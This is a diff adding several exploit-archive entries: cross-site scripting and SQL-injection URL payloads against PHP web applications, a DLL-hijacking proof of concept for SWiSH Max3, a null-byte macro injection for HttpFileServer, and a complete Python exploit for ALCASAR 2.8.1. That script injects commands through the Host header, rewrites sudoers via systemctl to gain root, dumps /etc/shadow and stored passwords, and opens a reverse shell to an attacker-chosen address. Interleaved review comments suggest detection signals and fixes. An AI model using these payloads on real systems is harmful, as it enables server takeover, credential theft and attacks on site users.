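+e-Soft24 PTC Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+e-Soft24 PTC Script 1.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/login.php
+
+1/ Connect you with : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
+
+2/ Password Forget : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
+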
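--- a/platforms/php/webapps/34653.txt
+++ b/platforms/php/webapps/34653.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43327/info
+
+e107 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+e107 0.7.23 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
+http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29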
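--- a/platforms/php/webapps/34655.txt
+++ b/platforms/php/webapps/34655.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43335/info
+
+Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
+http://www.example.com/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
+http://www.example.com/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>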
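--- a/platforms/php/webapps/34656.txt
+++ b/platforms/php/webapps/34656.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/includes/video_ad.php?pic_id=[XSS]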
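--- a/platforms/php/webapps/34657.txt
+++ b/platforms/php/webapps/34657.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/linkvideos_listing.php?category=[XSS]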
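--- a/platforms/php/webapps/34658.txt
+++ b/platforms/php/webapps/34658.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/templates/header1.php?id=[XSS]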
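--- a/platforms/php/webapps/34659.txt
+++ b/platforms/php/webapps/34659.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]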
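--- a/platforms/php/webapps/34660.txt
+++ b/platforms/php/webapps/34660.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/embed.php?name="><script>alert(document.cookie);</script>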
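--- a/platforms/php/webapps/34661.txt
+++ b/platforms/php/webapps/34661.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/info.php?name="><script>alert(document.cookie);</script>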
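--- a/platforms/php/webapps/34662.txt
+++ b/platforms/php/webapps/34662.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/lyrics.php?id="><script>alert(document.cookie);</script>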
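--- a/platforms/php/webapps/34663.txt
+++ b/platforms/php/webapps/34663.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43336/info
+
+x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>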
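--- a/platforms/php/webapps/34666.py
+++ b/platforms/php/webapps/34666.py
@@ -0,0 +1,229 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+####
+#
+# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
+#
+# Author: eF
+# Date : 2014-09-12
+# URL : http://www.alcasar.net/
+#
+# This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
+#
+# db 88 ,ad8888ba, db ad88888ba db 88888888ba
+# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
+# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
+# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
+# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
+# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
+# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
+# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
+#
+#
+# ALCASAR is a free Network Access Controller which controls the Internet consultation networks.
+# It authenticates, attributes and protects users' access regardless their connected equipment
+# (PC, smartphone, game console, etc.).
+#
+# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
+# As a reminder, it was a trivial code execution via a unfiltered exec() call:
+#
+# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
+# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
+#
+# A few days later, a new version corrects the vulnerability. Or maybe not...
+#
+# At first, this is how ALCASAR's developers present the previous vulnerability:
+#
+# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
+# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security "
+# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that "
+# " time, the download version of ALCASAR will be incremented (V2.8.1) "
+#
+# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
+# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
+# bypass firewall rules, act as another user, etc.
+# This is not just a matter of "retrieving a lot of data from the server".
+#
+# Not to alert users of real criticality of a vulnerability is a very serious lack of security.
+# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
+# one.
+#
+# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
+#
+# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
+#
+# WTF?!
+# First, I think that the application no longer works. By default, filter_var() is going to accept an URL
+# only if its scheme is valid:
+#
+# $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
+# bool(false)
+# $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
+# string(21) "http://www.google.com"
+#
+# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
+# Dev, did you try your patch?
+# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
+# Service down, vulnerability still present: double fail.
+#
+# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
+# as root.
+#
+# The patch therefore removes openssl in the sudoers file (without changing the legitimate
+# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
+#
+# We can create a service with our command and start it as root:
+#
+# sudo systemctl link /tmp/pwn3d.service
+# sudo systemctl start pwn3d.service
+#
+# Conclusion: triple fail.
+#
+# Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a
+# little training on secure PHP development?
+#
+# On ALCASAR website:
+#
+# "The security of the portal has been worked out like a bastion in order to resist to different
+# kinds of threat"
+#
+# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
+#
+# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
+# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
+# generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
+# etc.
+#
+# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
+# patched, etc. If the elementary rules of open source development had been met, a user could have
+# prevented this 2.8.1 patch from being crap.
+#
+#
+####
+
+import sys, os, re, httplib
+
+class PWN_Alcasar:
+
+    def __init__(self, host):
+        self.host = host
+        self.root = False
+
+    def exec_cmd(self, cmd, output=False):
+        tag = os.urandom(4).encode('hex')
+
+        cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
+        if self.root:
+            cmd = 'sudo %s' % cmd
+
+        wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
+        wrapper = wrapper.replace(' ', '${IFS}')
+        headers = {
+            'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
+        }
+
+        c = httplib.HTTPConnection(self.host)
+        c.request('GET', '/index.php', '', headers)
+        r = c.getresponse()
+        data = r.read()
+        c.close()
+
+        m = re.search(r'%s, (.*)\s</div>' % tag, data)
+        if m:
+            data = m.group(1).decode('base64')
+            if output:
+                print data
+            return data
+        return None
+
+    def read_file(self, filepath, output=True):
+        return self.exec_cmd('cat "%s"' % filepath, output=output)
+
+    def read_passwords(self):
+        self.read_file('/root/ALCASAR-passwords.txt')
+        self.read_file('/etc/shadow')
+        self.read_file('/usr/local/etc/digest/key_all')
+        self.read_file('/usr/local/etc/digest/key_admin')
+        self.read_file('/usr/local/etc/digest/key_backup')
+        self.read_file('/usr/local/etc/digest/key_manager')
+        self.read_file('/usr/local/etc/digest/key_only_admin')
+        self.read_file('/usr/local/etc/digest/key_only_backup')
+        self.read_file('/usr/local/etc/digest/key_only_manager')
+        alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
+        if alcasar_mysql:
+            m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
+            if m:
+                radiuspwd = m.group(1)
+                sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
+                self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
+
+    def edit_sudoers(self):
+        service = '[Unit]\n'
+        service += 'Description=Just another ALCASAR lolcalr00t\n\n'
+        service += '[Service]\n'
+        service += 'Type=forking\n'
+        service += 'KillMode=process\n'
+        service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
+        self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
+        self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
+        self.exec_cmd('sudo systemctl start Pwn3d.service')
+        if exploit.exec_cmd('sudo id').find('uid=0') != -1:
+            self.root = True
+
+    def reverse_shell(self, rip, rport='80'):
+        payload = 'import socket,subprocess,os;'
+        payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
+        payload += 's.connect((\'%s\',%s));' % (rip, rport)
+        payload += 'os.dup2(s.fileno(),0);'
+        payload += 'os.dup2(s.fileno(),1);'
+        payload += 'os.dup2(s.fileno(),2);'
+        payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
+        return self.exec_cmd('python -c "%s"' % payload)
+
+    def lolz(self):
+        old = 'http://www.wikipedia.org'
+        new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
+        self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)
+
+def usage():
+    print 'Usage: %s host command (ip) (port)' % sys.argv[0]
+    print ' "command" can be a shell command or "reverseshell"'
+    sys.exit(0)
+
+if __name__ == '__main__':
+
+    print '#' * 80
+    print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
+    print '# Author: eF'
+    print '#' * 80
+
+    if len(sys.argv) < 3:
+        usage()
+
+    cmd = sys.argv[2]
+    if cmd == 'reverseshell':
+        if len(sys.argv) < 5:
+            print '[!] Need IP and port for the reverse shell...'
+            sys.exit(0)
+        rip = sys.argv[3]
+        rport = sys.argv[4]
+
+    exploit = PWN_Alcasar(sys.argv[1])
+    print '[-] whoami (should be apache):'
+    exploit.exec_cmd('id', output=True)
+    print '[+] On the way to the uid 0...'
+    exploit.edit_sudoers()
+    print '[-] Got root?'
+    exploit.exec_cmd('id', output=True)
+    exploit.lolz()
+    if exploit.root:
+        print '[+] Here are some passwords for you (again):'
+        exploit.read_passwords()
+    if cmd == 'reverseshell':
+        print '[+] You should now have a shell on %s:%s' % (rip, rport)
+        exploit.reverse_shell(rip, rport)
+    else:
+        print '[+] Your command Sir:'
+        exploit.exec_cmd(cmd, output=True)
+    sys.exit(1)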
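Review bot: `exec_cmd` is the injection primitive of this script, yet nothing in the code says where the payload travels: the whole command is carried in the `Host` request header, prefixed with `mailto:` to satisfy the `FILTER_VALIDATE_URL` check the file header describes, with `${IFS}` standing in for spaces. A comment above the `headers` literal, `# injection point: HTTP Host header; 'mailto:' passes FILTER_VALIDATE_URL, ${IFS} replaces spaces`, would make the vector explicit and hands defenders both the detection signal (a Host value containing `mailto:`, `${IFS}` or a base64 pipeline is not a hostname) and the correct fix (compare HTTP_HOST against a server-side hostname allowlist instead of passing it to exec()). As a point of style, `edit_sudoers` reads its result through the module global `exploit` rather than `self`, which ties the class to the name chosen in the `__main__` block; `if self.exec_cmd('sudo id').find('uid=0') != -1:` keeps the method self-contained. The closing `sys.exit(1)` also returns a failure status on the path that just succeeded.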
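--- a/platforms/windows/remote/34654.c
+++ b/platforms/windows/remote/34654.c
@@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/43332/info
+
+SWiSH Max3 is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+SWiSH Max3 is vulnerable; other versions may also be affected.
+
+/*
+#SWiSHmax DLL Hijacking Exploit (swishmaxres.dll)
+#Author : anT!-Tr0J4n
+#Greetz : Dev-PoinT.com $ GlaDiatOr $ SILVER STAR $ Coffin Of Evil $ HoBeeZ $ Mr.Mh$TEr $ ?Own3d $ Cyber-Err0r $ Nashy $ all My Friends
+#contact: D3v-PoinT@hotmail.com & C1EH@Hotmail.com
+#Tested on: Windows XP sp3
+
+#How to use : Place a .swi file and swishmaxres.dll in same folder and execute .swi file in
+
+#swishmaxres.dll (code)
+*/
+
+#include "stdafx.h"
+
+void init() {
+    MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
+}
+
+
+BOOL APIENTRY DllMain( HANDLE hModule,
+                       DWORD ul_reason_for_call,
+                       LPVOID lpReserved
+                     )
+{
+    switch (ul_reason_for_call)
+    {
+    case DLL_PROCESS_ATTACH:
+        init();break;
+    case DLL_THREAD_ATTACH:
+    case DLL_THREAD_DETACH:
+    case DLL_PROCESS_DETACH:
+        break;
+    }
+    return TRUE;
+}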
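Review bot: `DllMain` calls `MessageBox` through `init()` on `DLL_PROCESS_ATTACH`, which executes under the loader lock; Microsoft's DllMain guidance says not to call user32 functions there because it can deadlock or crash the hosting process, so this proof-of-concept is not a reliable demonstration and should at least carry `/* NOTE: MessageBox from DllMain violates loader-lock rules; may hang the host */` above the `init();break;` line. The usage line in the header comment is cut off mid-sentence (`execute .swi file in`) and the advisory never states the mitigation. I would extend the header with a line describing the fix for the application: load `swishmaxres.dll` by absolute path or restrict the search order with `SetDllDirectory("")` / `LoadLibraryEx` and `LOAD_LIBRARY_SEARCH_SYSTEM32`, so the directory of the opened `.swi` file is never searched, with the `CWDIllegalInDllSearch` registry value as the system-wide mitigation. A one-line comment on `init()`, `/* demonstration payload: proves the DLL was loaded from the document's directory */`, would also make the intent of the function clear.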
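--- a/platforms/windows/remote/34668.txt
+++ b/platforms/windows/remote/34668.txt
@@ -0,0 +1,25 @@
+Affected software: http://sourceforge.net/projects/hfs/
+Version : 2.3x
+# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 11-09-2014
+# Remote: Yes
+# Exploit Author: Daniele Linguaglossa
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Windows Server 2008 , Windows 8, Windows 7
+# CVE : CVE-2014-6287
+
+issue exists due to a poor regex in the file ParserLib.pas
+
+
+function findMacroMarker(s:string; ofs:integer=1):integer;
+begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
+
+
+it will not handle null byte so a request to
+
+http://localhost:80/search=%00{.exec|cmd.}
+
+will stop regex from parse macro , and macro will be executed and remote code injection happen.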